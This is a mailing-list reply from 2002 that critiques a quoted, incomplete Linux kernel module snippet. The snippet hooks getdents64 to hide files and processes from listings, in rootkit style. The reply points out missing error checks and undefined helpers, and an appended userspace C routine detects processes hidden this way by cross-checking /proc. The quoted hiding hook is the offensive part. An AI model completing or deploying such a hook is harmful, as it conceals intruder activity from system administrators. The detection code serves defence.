On Thu, Aug 29, 2002 at 02:57:46PM +0300, Guy Cohen wrote:
> Here's a little modified (just a bit) snippet from phreak about
> how to hide files and processes. Can anyone answer me why
> does it exit after it finds the first hidden process, and doesn't go
> on to hide the second hidden process?
Nope, you provided incomplete and buggy code. Please post the entire
snippet if you want meaningful comments.
Comments inline.
> Thanks,
>
> Guy
>
> <+++>
> char hidden[] = "hidden";
> [...]
> int n_getdents64(unsigned int fd, struct dirent64 *dirp, unsigned int count)
> {
>     unsigned int tmp, n;
>     int t, proc=0;
>     struct inode *dinode;
>     struct dirent64 *dirp2, *dirp3;
>
>     tmp = (*orig_getdents64) (fd, dirp, count);
>
>     dinode = current->files->fd[fd]->f_dentry->d_inode;
>
>     if( dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
>         MINOR(dinode->i_dev) == 2)
>         proc = 1;
>
>     /*dinode is the inode of the required directory*/
>     if (tmp > 0)
>     {
>         /*dirp2 is a new dirent structure*/
>         dirp2 = (struct dirent64 *) kmalloc(tmp, GFP_KERNEL);
BAD MISTAKE, no checking for malloc failure.
>         /*copy original dirent structure to dirp2*/
>         copy_from_user(dirp2, dirp, tmp);
And no checking for copy_from_user failing.
>         /*dirp3 points to dirp2*/
>         dirp3 = dirp2;
>
>         t = tmp;
>
>         while (t > 0)
>         {
>             n = dirp3->d_reclen;
>             t -= n;
>
>             /*check if current filename is the name of the file we want to hide*/
>             /* or pid */
>             if ( (strstr((char *) &(dirp3->d_name), (char *) &hidden) != NULL) ||
>                  (proc && invisible(myatoi(dirp3->d_name))))
where is invisible defined? myatoi?
>             {
>                 /*modify dirent struct if necessary*/
>                 if (t != 0)
>                     memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
this looks... suspicious.
>                 else
>                     dirp3->d_off = 1024;
>                 tmp -= n;
>             }
>
>             if (t != 0)
>                 dirp3 = (struct dirent64 *) ((char *) dirp3 + dirp3->d_reclen);
>
>         }
>
>         copy_to_user(dirp, dirp2, tmp);
Need to check here as well.
>         kfree(dirp2);
>     }
>     return tmp;
> }
>
> <--->
>
> If you want to see a little KERN_DEBUG:
There's not a single printk in the snippet above. Where is this log
from?
> ps was run after
> /hiddensleep &
> /hiddensleep2 &
>
> [...]
> Aug 29 14:40:22 arpo kernel: IS IT?: hiddensleep
> Aug 29 14:40:22 arpo kernel: GOT IT, IT'S: hiddensleep
> Aug 29 14:40:22 arpo kernel: tmp = 456, t = 48, n = 24
> Aug 29 14:40:22 arpo kernel: IS IT?: ps
> Aug 29 14:40:22 arpo kernel: IS IT?: ps
> Aug 29 14:40:22 arpo kernel: IS IT?: less
> Aug 29 14:40:22 arpo kernel: +++
> Aug 29 14:40:22 arpo kernel: dinode->i_ino(1) == 1
> Aug 29 14:40:22 arpo kernel: !MAJOR(dinode->i_dev) == 1
> Aug 29 14:40:23 arpo kernel: MINOR(dinode->i_dev) == 2
> Aug 29 14:40:23 arpo kernel: tmp = 0
> [end]
>
>
> BTW: I know some of you prolly wrote a better module that does this
> and even more.. I'm not interested in getting its source (it's just too easy),
> I want to keep working on mine.
Sure, but do it right...
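For the defensive side of the same mechanism, here is an added example (not from the original post or the quoted snippet's author): a hook that drops entries from the getdents64 result only alters the directory listing, so a process it hides from `ps` still answers a direct lookup of /proc/<pid>/status. Cross-checking the two from userspace flags such a process. It assumes a Linux /proc with the usual `Tgid:` line in status and the `kernel.pid_max` sysctl; `find_hidden_pids` and `tgid_of` are names chosen here.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>

/* Tgid from /proc/<pid>/status, or -1 if the pid does not exist. Requiring Tgid == pid
 * skips thread ids, which answer /proc/<tid> lookups but are legitimately unlisted. */
static int tgid_of(int pid)
{
    char path[64], line[128];
    int tgid = -1;
    snprintf(path, sizeof path, "/proc/%d/status", pid);
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    while (fgets(line, sizeof line, f) && sscanf(line, "Tgid:\t%d", &tgid) != 1)
        ;
    fclose(f);
    return tgid;
}

/* Report pids that answer direct lookups before and after the listing but never appear
 * in it. Stores up to cap pids in out (NULL to count only); returns count or -1 on error. */
int find_hidden_pids(int *out, int cap)
{
    int pid_max = 32768, found = 0;          /* fallback if the sysctl is unreadable */
    FILE *pm = fopen("/proc/sys/kernel/pid_max", "r");
    if (pm) { (void)fscanf(pm, "%d", &pid_max); fclose(pm); }
    unsigned char *alive = calloc(pid_max + 1, 1), *listed = calloc(pid_max + 1, 1);
    DIR *d = opendir("/proc");
    if (!alive || !listed || !d) { free(alive); free(listed); if (d) closedir(d); return -1; }
    /* Pass 1: probe every pid directly. kill(pid, 0) is just a cheap pre-filter:
     * ESRCH means no such task, any other result means "maybe, ask /proc". */
    for (int pid = 1; pid <= pid_max; pid++)
        if ((kill(pid, 0) == 0 || errno != ESRCH) && tgid_of(pid) == pid) alive[pid] = 1;
    /* Pass 2: what the directory listing (the getdents64 path) admits to. */
    for (struct dirent *de; (de = readdir(d)) != NULL;) {
        char *end; long pid = strtol(de->d_name, &end, 10);
        if (*end == '\0' && pid >= 1 && pid <= pid_max) listed[pid] = 1;
    }
    closedir(d);
    /* Pass 3: re-probe candidates so a process that exited between passes is not reported. */
    for (int pid = 1; pid <= pid_max; pid++)
        if (alive[pid] && !listed[pid] && tgid_of(pid) == pid && ++found <= cap && out)
            out[found - 1] = pid;            /* found keeps counting past cap */
    free(alive); free(listed);
    return found;
}
```

On an unmodified kernel the count is 0; a non-zero result names pids that the listing omits while the per-pid files still exist, which is exactly the footprint a getdents64 filter leaves.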